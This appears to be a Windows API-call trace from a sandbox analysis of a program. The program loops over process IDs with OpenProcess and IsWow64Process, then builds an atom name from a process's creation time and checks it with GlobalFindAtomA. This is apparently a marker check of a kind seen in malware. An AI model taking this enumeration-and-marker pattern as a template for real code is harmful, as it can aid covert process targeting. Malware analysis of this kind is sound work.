	[0112.947] CloseHandle (hObject=0x690) returned 1
	[0112.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0112.947] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.947] CloseHandle (hObject=0x690) returned 1
	[0112.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0112.947] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.947] CloseHandle (hObject=0x690) returned 1
	[0112.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0112.948] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.948] CloseHandle (hObject=0x690) returned 1
	[0112.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0112.948] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.948] CloseHandle (hObject=0x690) returned 1
	[0112.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0112.948] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.948] CloseHandle (hObject=0x690) returned 1
	[0112.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0112.948] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.948] CloseHandle (hObject=0x690) returned 1
	[0112.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0112.948] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.948] CloseHandle (hObject=0x690) returned 1
	[0112.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0112.949] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.949] CloseHandle (hObject=0x690) returned 1
	[0112.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0112.949] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.949] CloseHandle (hObject=0x690) returned 1
	[0112.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0112.949] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.949] CloseHandle (hObject=0x690) returned 1
	[0112.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0112.949] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.949] CloseHandle (hObject=0x690) returned 1
	[0112.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0112.949] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.949] CloseHandle (hObject=0x690) returned 1
	[0112.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0112.950] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.950] CloseHandle (hObject=0x690) returned 1
	[0112.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0112.950] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.950] CloseHandle (hObject=0x690) returned 1
	[0112.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0112.950] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0112.951] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0112.951] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0112.951] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0112.951] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0112.951] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0112.951] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0112.952] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0112.952] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0112.952] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0112.954] CloseHandle (hObject=0x690) returned 1
	[0112.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0112.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0112.954] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.954] CloseHandle (hObject=0x690) returned 1
	[0112.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0112.954] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.954] CloseHandle (hObject=0x690) returned 1
	[0112.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x690
	[0112.954] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0112.954] CloseHandle (hObject=0x690) returned 1
	[0113.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0113.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0113.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0113.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0113.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0113.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0113.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0113.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0113.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0113.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0113.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0113.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0113.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0113.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0113.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0113.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0113.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0113.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0113.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0113.070] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.070] CloseHandle (hObject=0x690) returned 1
	[0113.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0113.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0113.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0113.078] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.078] CloseHandle (hObject=0x690) returned 1
	[0113.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0113.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0113.079] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.079] CloseHandle (hObject=0x690) returned 1
	[0113.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0113.079] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.079] CloseHandle (hObject=0x690) returned 1
	[0113.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0113.079] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.079] CloseHandle (hObject=0x690) returned 1
	[0113.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0113.079] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.079] CloseHandle (hObject=0x690) returned 1
	[0113.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0113.080] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.080] CloseHandle (hObject=0x690) returned 1
	[0113.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0113.080] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.080] CloseHandle (hObject=0x690) returned 1
	[0113.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0113.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0113.080] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.080] CloseHandle (hObject=0x690) returned 1
	[0113.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0113.080] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.080] CloseHandle (hObject=0x690) returned 1
	[0113.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0113.081] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.081] CloseHandle (hObject=0x690) returned 1
	[0113.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0113.081] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.081] CloseHandle (hObject=0x690) returned 1
	[0113.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0113.081] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.081] CloseHandle (hObject=0x690) returned 1
	[0113.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0113.081] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.081] CloseHandle (hObject=0x690) returned 1
	[0113.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0113.081] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.081] CloseHandle (hObject=0x690) returned 1
	[0113.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0113.082] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.082] CloseHandle (hObject=0x690) returned 1
	[0113.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0113.082] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.082] CloseHandle (hObject=0x690) returned 1
	[0113.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0113.082] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.082] CloseHandle (hObject=0x690) returned 1
	[0113.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0113.082] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.082] CloseHandle (hObject=0x690) returned 1
	[0113.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0113.082] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.082] CloseHandle (hObject=0x690) returned 1
	[0113.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0113.083] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.083] CloseHandle (hObject=0x690) returned 1
	[0113.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0113.083] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.083] CloseHandle (hObject=0x690) returned 1
	[0113.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0113.083] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.083] CloseHandle (hObject=0x690) returned 1
	[0113.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0113.083] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.083] CloseHandle (hObject=0x690) returned 1
	[0113.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0113.084] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.084] CloseHandle (hObject=0x690) returned 1
	[0113.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0113.084] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.084] CloseHandle (hObject=0x690) returned 1
	[0113.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0113.084] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.084] CloseHandle (hObject=0x690) returned 1
	[0113.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0113.084] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.084] CloseHandle (hObject=0x690) returned 1
	[0113.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0113.085] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.085] CloseHandle (hObject=0x690) returned 1
	[0113.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0113.085] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.085] CloseHandle (hObject=0x690) returned 1
	[0113.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0113.085] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.085] CloseHandle (hObject=0x690) returned 1
	[0113.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0113.086] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.086] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0113.086] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0113.086] wsprintfA (in: param_1=0x3993268, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0113.086] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.089] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0113.089] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.090] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0113.090] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0113.090] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0113.090] CloseHandle (hObject=0x690) returned 1
	[0113.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0113.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0113.090] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.090] CloseHandle (hObject=0x690) returned 1
	[0113.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0113.090] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.090] CloseHandle (hObject=0x690) returned 1
	[0113.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x690
	[0113.091] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.091] CloseHandle (hObject=0x690) returned 1
	[0113.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0113.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0113.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0113.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0113.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0113.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0113.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0113.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0113.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0113.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0113.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0113.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0113.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0113.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0113.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0113.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0113.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0113.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0113.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0113.258] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.258] CloseHandle (hObject=0x690) returned 1
	[0113.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0113.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0113.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0113.259] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.259] CloseHandle (hObject=0x690) returned 1
	[0113.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0113.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0113.259] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.259] CloseHandle (hObject=0x690) returned 1
	[0113.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0113.259] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.259] CloseHandle (hObject=0x690) returned 1
	[0113.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0113.259] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.259] CloseHandle (hObject=0x690) returned 1
	[0113.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0113.260] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.260] CloseHandle (hObject=0x690) returned 1
	[0113.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0113.260] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.260] CloseHandle (hObject=0x690) returned 1
	[0113.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0113.260] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.260] CloseHandle (hObject=0x690) returned 1
	[0113.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0113.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0113.260] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.260] CloseHandle (hObject=0x690) returned 1
	[0113.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0113.261] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.261] CloseHandle (hObject=0x690) returned 1
	[0113.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0113.261] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.261] CloseHandle (hObject=0x690) returned 1
	[0113.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0113.261] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.261] CloseHandle (hObject=0x690) returned 1
	[0113.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0113.261] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.261] CloseHandle (hObject=0x690) returned 1
	[0113.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0113.262] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.262] CloseHandle (hObject=0x690) returned 1
	[0113.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0113.266] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.266] CloseHandle (hObject=0x690) returned 1
	[0113.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0113.267] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.267] CloseHandle (hObject=0x690) returned 1
	[0113.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0113.267] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.267] CloseHandle (hObject=0x690) returned 1
	[0113.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0113.267] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.267] CloseHandle (hObject=0x690) returned 1
	[0113.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0113.267] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.267] CloseHandle (hObject=0x690) returned 1
	[0113.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0113.268] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.268] CloseHandle (hObject=0x690) returned 1
	[0113.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0113.268] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.268] CloseHandle (hObject=0x690) returned 1
	[0113.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0113.268] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.269] CloseHandle (hObject=0x690) returned 1
	[0113.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0113.269] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.269] CloseHandle (hObject=0x690) returned 1
	[0113.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0113.269] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.269] CloseHandle (hObject=0x690) returned 1
